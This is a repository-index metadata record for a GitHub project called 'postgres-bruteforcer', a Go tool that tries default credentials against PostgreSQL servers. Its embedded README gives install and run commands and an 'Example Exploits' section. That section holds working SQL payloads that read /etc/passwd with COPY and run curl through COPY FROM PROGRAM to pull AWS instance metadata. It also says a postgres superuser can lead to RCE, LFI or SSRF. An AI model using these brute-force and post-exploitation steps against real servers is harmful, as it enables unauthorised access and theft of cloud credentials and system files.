{"id":21125699,"url":"https://github.com/randomrobbiebf/postgres-bruteforcer","last_synced_at":"2025-03-14T11:41:28.990Z","repository":{"id":65211607,"uuid":"587700518","full_name":"RandomRobbieBF/postgres-bruteforcer","owner":"RandomRobbieBF","description":"This tool takes a list of default creds and tests it against a postgresql server and logs any that work and the databases it has access to.","archived":false,"fork":false,"pushed_at":"2023-01-11T11:49:03.000Z","size":10,"stargazers_count":0,"open_issues_count":0,"forks_count":2,"subscribers_count":2,"default_branch":"main","last_synced_at":"2025-01-21T05:41:44.073Z","etag":null,"topics":[],"latest_commit_sha":null,"homepage":null,"language":"Go","has_issues":true,"has_wiki":null,"has_pages":null,"mirror_url":null,"source_name":null,"license":null,"status":null,"scm":"git","pull_requests_enabled":true,"icon_url":"https://github.com/RandomRobbieBF.png","metadata":{"files":{"readme":"README.md","changelog":null,"contributing":null,"funding":null,"license":null,"code_of_conduct":null,"threat_model":null,"audit":null,"citation":null,"codeowners":null,"security":null,"support":null}},"created_at":"2023-01-11T11:30:01.000Z","updated_at":"2024-08-12T20:29:17.000Z","dependencies_parsed_at":"2023-01-15T15:15:41.540Z","dependency_job_id":null,"html_url":"https://github.com/RandomRobbieBF/postgres-bruteforcer","commit_stats":null,"previous_names":[],"tags_count":2,"template":false,"template_full_name":null,"repository_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/RandomRobbieBF%2Fpostgres-bruteforcer","tags_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/RandomRobbieBF%2Fpostgres-bruteforcer/tags","releases_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/RandomRobbieBF%2Fpostgres-bruteforcer/releases","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/RandomRobbieBF%2Fpostgres-bruteforcer/manifests","owner_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/owners/RandomRobbieBF","download_url":"https://codeload.github.com/RandomRobbieBF/postgres-bruteforcer/tar.gz/refs/heads/main","host":{"name":"GitHub","url":"https://github.com","kind":"github","repositories_count":243573166,"owners_count":20312879,"icon_url":"https://github.com/github.png","version":null,"created_at":"2022-05-30T11:31:42.601Z","updated_at":"2022-07-04T15:15:14.044Z","host_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub","repositories_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories","repository_names_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repository_names","owners_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/owners"}},"keywords":[],"created_at":"2024-11-20T04:36:25.981Z","updated_at":"2025-03-14T11:41:28.952Z","avatar_url":"https://github.com/RandomRobbieBF.png","language":"Go","funding_links":[],"categories":[],"sub_categories":[],"readme":"# postgres-bruteforcer\n\nAbout\n---\n\nThis Go script reads a list of usernames and passwords from a file called `creds.txt` and tests them against a PostgreSQL database. \n\nThe script accepts an IP of the PostgreSQL server as a command line argument or a text file of ip's. \n\nIf an access is granted, the script writes this output to a file called `pg-output.txt`.\n\nIf the user `postgres` is avalible this is normally a super user which can allow RCE or LFI or SSRf.\n\n\nHow to install\n---\n\n```\ngo install -v github.com/RandomRobbieBF/postgres-bruteforcer@latest\n```\n\nHow to run\n---\n\n```\ngo run postgres-brute.go 1.1.1.1\n\npostgres\n\n```\n\n\nExample Exploits\n----\n\nGrab `/etc/passwd/`\n\n```\nCREATE TABLE myfile (input TEXT);\nCOPY myfile FROM '/etc/passwd';\nSELECT input FROM myfile;\n```\n\nSSRF - Grab AWS Metadata\n\n```\nCREATE TABLE weather_json (cities TEXT);\nCOPY weather_json FROM PROGRAM 'curl -L http://169.254.169.254/latest/meta-data/';\nSELECT weather_json FROM weather_json;\n```\n\n\n","project_url":"https://awesome.ecosyste.ms/api/v1/projects/github.com%2Frandomrobbiebf%2Fpostgres-bruteforcer","html_url":"https://awesome.ecosyste.ms/projects/github.com%2Frandomrobbiebf%2Fpostgres-bruteforcer","lists_url":"https://awesome.ecosyste.ms/api/v1/projects/github.com%2Frandomrobbiebf%2Fpostgres-bruteforcer/lists"}